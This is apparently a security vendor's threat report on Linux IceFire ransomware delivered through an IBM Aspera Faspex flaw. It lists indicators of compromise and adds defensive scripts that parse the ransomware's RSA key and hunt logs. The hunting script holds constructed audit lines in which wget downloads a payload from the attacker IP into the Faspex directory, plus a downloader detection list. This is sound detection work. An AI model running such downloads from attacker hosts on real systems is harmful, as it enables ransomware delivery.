- In recent weeks SentinelLabs observed novel Linux versions of IceFire ransomware being deployed within the enterprise network intrusions of several media and entertainment sector organizations worldwide.
- Current observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a deserialization vulnerability in IBM Aspera Faspex file sharing software.
- The operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their focus to include Linux.
- This strategic shift is a significant move that aligns them with other ransomware groups who also target Linux systems.

SentinelLabs recently observed a novel Linux version of the IceFire ransomware being deployed in mid-February against enterprise networks. The iFire file extension is associated with known reports of IceFire, a ransomware family noted by MalwareHunterTeam in March 2022:

> Another new ransomware just appeared: IceFire.
> Already seen victim companies from multiple countries, including multiple victims from 1-1 countries in the past < 40 hours, so they started "hard" it seems… /QfguAicNYO

Prior to this report, IceFire had only shown a Windows-centric focus. The attackers' tactics are consistent with those of the 'big-game hunting' (BGH) ransomware families, which involve double extortion, targeting large enterprises, using numerous persistence mechanisms, and evading analysis by deleting log files.

Previous reports indicate that IceFire targeted technology companies; SentinelLabs observed these recent attacks against organizations in the media and entertainment sector. IceFire has impacted victims in Turkey, Iran, Pakistan, and the United Arab Emirates, which are typically not a focus for organized ransomware actors.

The IceFire Linux version (SHA-1: b676c38d5c309b64ab98c2cd82044891134a9973) is a 2.18 MB, 64-bit ELF binary compiled with gcc for the AMD64 architecture. We tested the sample on Intel-based distributions of Ubuntu and Debian; IceFire ran successfully on both test systems.

In observed intrusions, the Linux version was deployed against CentOS hosts running a vulnerable version of the IBM Aspera Faspex file server software. The system downloaded two payloads using wget and saved them to /opt/aspera/faspex:

Open-source intelligence platforms revealed a history of Aspera Faspex activity on IP address 159.65.217.216, including:

- Other payload URLs with "aspera" in the secondary hostname section of the URI.
- Session cookie name: _aspera_faspex_session.
- Service fingerprinting indexed a vulnerable version of Aspera Faspex software.

As of this writing, the IceFire binary was detected by 0/61 VirusTotal engines.

Notably, this sample contains many statically linked functions from the legitimate OpenSSL library, contributing to the relatively large file size. The binary contains the following hardcoded RSA public key:

```
MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+
ZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w
FadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP
c0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE
j6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK
dvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB
```

In a cryptographic logging function, the binary contains an embedded path referencing the Desktop for a user named "Jhone." The .cnf extension potentially refers to a configuration file. Because this relic sits near the end of the OpenSSL functionality, it is possible that the OpenSSL package contained this artifact and that it does not necessarily originate from the ransomware developer.
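The hardcoded key above is a PKCS#1 `RSAPublicKey` (`SEQUENCE { INTEGER n, INTEGER e }`), which is why the base64 begins with `MIIBCg...` and ends with `...AQAB`. The following script is an added triage example, not SentinelLabs tooling or code from the sample: it decodes the key as printed in the report (with the base64 `+` characters restored where the page rendering had dropped them), parses the DER by hand with only the standard library, and reports modulus size, public exponent, the SHA-256 of the DER (usable as a sample-linking indicator) and a PEM rendering that `openssl rsa -RSAPublicKey_in -pubin` can load.

```python
"""Parse the RSA public key hardcoded in the IceFire Linux sample.

Added triage example (not SentinelLabs code). The base64 string is the key
printed in the report; the PKCS#1 RSAPublicKey DER structure is parsed by hand
so nothing beyond the standard library is required.
"""
import base64
import hashlib

# Key as printed in the report (six 64-character base64 lines, '+' restored).
ICEFIRE_RSA_PUBKEY_B64 = (
    "MIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+"
    "ZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w"
    "FadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP"
    "c0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE"
    "j6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK"
    "dvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB"
)


def _read_tlv(buf: bytes, pos: int):
    """Return (tag, value, next_pos) for the single DER TLV starting at buf[pos]."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        nbytes = length & 0x7F
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    return tag, buf[pos:pos + length], pos + length


def to_pem(der: bytes) -> str:
    """Wrap DER as a PKCS#1 'RSA PUBLIC KEY' PEM block (64-char lines)."""
    b64 = base64.b64encode(der).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN RSA PUBLIC KEY-----\n{body}\n-----END RSA PUBLIC KEY-----\n"


def parse_rsa_public_key(b64: str) -> dict:
    """Decode a base64 PKCS#1 RSAPublicKey and return its parameters and indicators."""
    der = base64.b64decode(b64)
    tag, body, end = _read_tlv(der, 0)
    if tag != 0x30 or end != len(der):
        raise ValueError("not a single DER SEQUENCE")
    tag_n, n_bytes, pos = _read_tlv(body, 0)
    tag_e, e_bytes, pos = _read_tlv(body, pos)
    if tag_n != 0x02 or tag_e != 0x02 or pos != len(body):
        raise ValueError("expected SEQUENCE { INTEGER n, INTEGER e }")
    n = int.from_bytes(n_bytes, "big")
    e = int.from_bytes(e_bytes, "big")
    return {
        "der_len": len(der),
        "modulus_bits": n.bit_length(),
        "exponent": e,
        # leading 0x00 is DER sign padding, not part of the modulus
        "modulus_prefix_hex": n_bytes.lstrip(b"\x00")[:4].hex(),
        "der_sha256": hashlib.sha256(der).hexdigest(),
        "pem": to_pem(der),
    }


if __name__ == "__main__":
    info = parse_rsa_public_key(ICEFIRE_RSA_PUBKEY_B64)
    for k, v in info.items():
        print(f"{k}: {v}" if k != "pem" else v)
```

The modulus size and exponent tell you nothing exploitable (a 2048-bit key with e=65537 is unremarkable); the value of parsing it is the stable indicators it yields. The DER hash or the first modulus bytes can be pivoted on across samples, and the PEM form lets an analyst confirm in OpenSSL that the embedded blob is a usable key rather than, say, a decoy string.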
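Two of the observations above translate directly into hunt logic: a downloader (wget, or curl by extension) writing into /opt/aspera/faspex on a Faspex host, and any traffic to 159.65.217.216. The script below is an added example, not SentinelLabs tooling; it runs that logic over constructed auditd EXECVE records and constructed firewall-style connection lines. The payload file names and URL paths in the sample lines are hypothetical, since the report does not print them.

```python
"""Hunt for the Faspex-hosted IceFire delivery pattern in host and network logs.

Added example (not SentinelLabs code). Encodes two facts from the report:
payloads were fetched with wget into /opt/aspera/faspex, and 159.65.217.216
has a history of Aspera Faspex activity. All log lines are constructed;
payload names and URL paths are hypothetical.
"""
import os
import re
from typing import Dict, List, Optional

FASPEX_DIR = "/opt/aspera/faspex"
SUSPECT_IP = "159.65.217.216"
DOWNLOADERS = {"wget", "curl"}  # curl added by assumption; the report names wget

# Constructed auditd EXECVE records. Only double-quoted argument values are
# handled (auditd hex-encodes arguments containing spaces or control bytes).
AUDIT_LINES = [
    'type=EXECVE msg=audit(1676543210.101:201): argc=4 a0="wget" a1="-P" '
    'a2="/opt/aspera/faspex" a3="http://159.65.217.216/example-payload"',
    'type=EXECVE msg=audit(1676543211.500:202): argc=3 a0="wget" a1="-O" '
    'a2="/var/tmp/update.tar.gz"',
    'type=EXECVE msg=audit(1676543212.333:203): argc=2 a0="ls" a1="/opt/aspera/faspex"',
    'type=EXECVE msg=audit(1676543213.777:204): argc=3 a0="/usr/bin/curl" a1="-o" '
    'a2="/opt/aspera/faspex/example.bin"',
]

# Constructed connection-log lines (key=value style, e.g. from a firewall).
NET_LINES = [
    "2023-02-14T10:13:30Z src=10.0.0.25 dst=159.65.217.216 dport=80 proto=tcp action=allow",
    "2023-02-14T10:13:31Z src=10.0.0.25 dst=93.184.216.34 dport=443 proto=tcp action=allow",
    "2023-02-14T10:13:32Z src=159.65.217.216 dst=10.0.0.25 dport=443 proto=tcp action=allow",
]

_SERIAL_RE = re.compile(r"msg=audit\([\d.]+:(\d+)\)")
_ARG_RE = re.compile(r'\ba(\d+)="([^"]*)"')


def parse_execve(line: str) -> Optional[Dict]:
    """Return {'serial': str, 'argv': [...]} for an EXECVE record, else None."""
    if "type=EXECVE" not in line:
        return None
    serial = _SERIAL_RE.search(line)
    args = sorted(((int(i), v) for i, v in _ARG_RE.findall(line)), key=lambda t: t[0])
    if not serial or not args:
        return None
    return {"serial": serial.group(1), "argv": [v for _, v in args]}


def is_faspex_download(argv: List[str]) -> bool:
    """True when a downloader targets FASPEX_DIR itself or a path beneath it."""
    if os.path.basename(argv[0]) not in DOWNLOADERS:
        return False
    return any(a == FASPEX_DIR or a.startswith(FASPEX_DIR + "/") for a in argv[1:])


def hunt_execve(lines: List[str]) -> List[str]:
    """Serials of EXECVE records matching the download-into-Faspex pattern."""
    hits = []
    for line in lines:
        rec = parse_execve(line)
        if rec and is_faspex_download(rec["argv"]):
            hits.append(rec["serial"])
    return hits


def hunt_network(lines: List[str]) -> List[str]:
    """Connection lines where SUSPECT_IP appears as source or destination."""
    kv = re.compile(r"\b(src|dst)=(\S+)")
    return [ln for ln in lines if any(v == SUSPECT_IP for _, v in kv.findall(ln))]


if __name__ == "__main__":
    print("EXECVE hits:", hunt_execve(AUDIT_LINES))
    print("network hits:", hunt_network(NET_LINES))
```

The EXECVE check keys on the destination directory rather than on a URL, because the only fixed element the report gives is the drop path; matching on 159.65.217.216 alone would miss a rotated staging server. Run against real auditd data, expect legitimate Faspex maintenance to write into that directory too, so treat a hit as a triage lead and pivot on the parent process and the fetched URL.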